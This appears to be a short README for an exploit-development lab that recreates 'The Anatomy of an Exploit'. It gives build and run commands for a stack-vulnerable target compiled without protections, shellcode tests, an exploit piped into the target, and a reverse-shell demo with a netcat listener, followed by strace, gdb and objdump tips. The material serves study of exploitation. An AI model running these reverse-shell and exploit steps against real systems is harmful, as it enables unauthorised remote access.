Framework to recreate the process to make shellcode
Recreate the structure from The Anatomy of an Exploit
- Target: target.cpp
clang++ -z execstack -fno-stack-protector -o target target.cpp
./target
- C code for shellcode: shellcode.c
clang -Os -static -fno-stack-protector -o shellcode shellcode.c
./shellcode
- Inline asm shellcode: shellcode_asm.c
clang -o shellcode_asm shellcode_asm.c
./shellcode_asm
- Shellcode in char buffer test: shellcode_test.c
clang -z execstack -fno-stack-protector -o shellcode_test shellcode_test.c
./shellcode_test
- Exploit framework: exploit.c
clang -o exploit exploit.c
./exploit
- Pipe exploit output in as target input
./exploit | ./launch
Reverse shell C code
In one terminal:
nc -nvlp 4444
In another:
clang -o reverse_shellcode reverse_shellcode.c
./reverse_shellcode
Tips:
- strace
./exploit > file
strace -o strace.log ./launch < file
cat strace.log
- gdb
./exploit > file
gdb -q ./launch
(gdb) r < file
- objdump
objdump -d shellcode | grep -A 14 "<main>"